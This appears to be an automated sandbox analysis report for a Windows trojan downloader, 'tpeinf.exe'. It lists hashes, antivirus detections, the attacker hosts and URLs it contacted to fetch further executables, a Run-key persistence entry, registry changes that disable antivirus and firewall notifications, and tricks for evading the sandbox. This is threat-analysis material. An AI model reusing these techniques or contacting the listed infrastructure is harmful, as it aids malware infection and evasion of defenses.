popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

tpeinf.exe

Generic Malware UPX Downloader Admin Tool (Sysinternals etc ...) Malicious Library Malicious Packer PE File PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 16, 2024, 11 a.m. July 16, 2024, 11:02 a.m.
Size 6.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cfb7fbf1d4b077a0e74ed6e9aab650a8
SHA256 d93add71a451ec7c04c99185ae669e59fb866eb38f463e9425044981ed1bcae0
CRC32 174C8FCF
ssdeep 96:An2ZBONNkv90S32BOl7LN8cVHH/PtboynuYUBPCtL:An3NNazCE7dfP1oynfUBe
Yara
  • Network_Downloader - File Downloader
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
twizt.net
A 185.215.113.66
185.215.113.66
www.update.microsoft.com
CNAME redir.update.msft.com.trafficmanager.net
A 20.109.209.108
20.72.235.82
IP Address Status Action
151.232.168.137 Active Moloch
151.232.191.74 Active Moloch
164.124.101.2 Active Moloch
178.130.83.254 Active Moloch
185.215.113.66 Active Moloch
188.213.178.116 Active Moloch
190.202.1.132 Active Moloch
2.181.30.194 Active Moloch
2.182.90.75 Active Moloch
20.109.209.108 Active Moloch
41.101.188.28 Active Moloch
5.232.85.255 Active Moloch
77.95.2.142 Active Moloch
89.218.44.218 Active Moloch
95.59.118.94 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
packer Armadillo v1.71
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/1
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.66/2
request GET http://twizt.net/newtpp.exe
request GET http://twizt.net/peinstall.php
request GET http://185.215.113.66/1
request GET http://185.215.113.66/2
ip 151.232.191.74
ip 188.213.178.116
ip 190.202.1.132
ip 2.181.30.194
ip 2.182.90.75
ip 5.232.85.255
ip 77.95.2.142
ip 89.218.44.218
ip 95.59.118.94
description sysmablsvr.exe tried to sleep 183 seconds, actually delayed analysis time by 183 seconds
file C:\Users\test22\AppData\Local\Temp\1737930154.exe
file C:\Users\test22\AppData\Local\Temp\1866818480.exe
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x000002c0
filepath: C:\Users\test22\AppData\Local\Temp\33573537.jpg
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\33573537.jpg
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000370
filepath: C:\Users\test22\tbtnds.dat
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\tbtnds.dat
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Local\Temp\1866818480.exe
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $m«qj)Ê9)Ê9)Ê9 ²•9.Ê9Q¸8+Ê9êÅB9+Ê9êÅ@9(Ê9êÅ9+Ê9 r9-Ê9)Ê9éÊ9 d9<Ê9 ²œ9-Ê9 ²›95Ê9 ²Ž9(Ê9Rich)Ê9
request_handle: 0x00cc000c
1 1 0
host 151.232.168.137
host 151.232.191.74
host 178.130.83.254
host 188.213.178.116
host 190.202.1.132
host 2.181.30.194
host 2.182.90.75
host 41.101.188.28
host 5.232.85.255
host 77.95.2.142
host 89.218.44.218
host 95.59.118.94
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings reg_value C:\Windows\sysmablsvr.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
process tpeinf.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
process tpeinf.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
process sysmablsvr.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
file C:\Windows\sysmablsvr.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\1737930154.exe:Zone.Identifier
file C:\Users\test22\AppData\Local\Temp\1866818480.exe:Zone.Identifier
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description attempts to disable antivirus notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description attempts to disable firewall notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description attempts to disable windows update notifications registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
service wuauserv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start)
service BITS (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start)
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Tiny.a!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.Generic.xt
Cylance Unsafe
VIPRE Gen:Heur.Mint.Zard.11
Sangfor Downloader.Win32.Agent.V1z7
K7AntiVirus Trojan ( 005a7a411 )
BitDefender Gen:Heur.Mint.Zard.11
K7GW Trojan ( 005a7a411 )
Cybereason malicious.1d4b07
Arcabit Trojan.Mint.Zard.11
VirIT Trojan.Win32.Genus.OHA
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Tiny.NTO
APEX Malicious
McAfee GenericRXAA-FA!CFB7FBF1D4B0
Avast Win32:Evo-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.Win32.Convagent.gen
Alibaba TrojanDownloader:Win32/Generic.4ef83f0b
NANO-Antivirus Trojan.Win32.Tiny.jvzevg
MicroWorld-eScan Gen:Heur.Mint.Zard.11
Rising Downloader.Agent!1.F26F (CLASSIC)
Emsisoft Gen:Heur.Mint.Zard.11 (B)
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.DownLoader.origin
Zillya Downloader.Tiny.Win32.25607
TrendMicro Mal_DLDER
McAfeeD Real Protect-LS!CFB7FBF1D4B0
FireEye Generic.mg.cfb7fbf1d4b077a0
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Tiny
Webroot W32.Trojan.Gen
Google Detected
Avira TR/Crypt.XPACK.Gen
MAX malware (ai score=100)
Antiy-AVL Trojan[Downloader]/Win32.Tiny
Kingsoft malware.kb.a.1000
Xcitium Malware@#39haopuw30io5
Microsoft Trojan:Win32/Phorpiex.RB!MTB
ZoneAlarm HEUR:Trojan-Downloader.Win32.Convagent.gen
GData Gen:Heur.Mint.Zard.11
AhnLab-V3 Trojan/Win.Dlder.C5394644
BitDefenderTheta AI:Packer.46101D181F
DeepInstinct MALICIOUS
VBA32 BScope.Trojan.Caynamer
Malwarebytes Generic.Malware/Suspicious
Panda Trj/GdSda.A
TrendMicro-HouseCall Mal_DLDER
dead_host 41.101.188.28:40500
dead_host 178.130.83.254:40500
dead_host 151.232.168.137:40500
dead_host 192.168.56.101:49172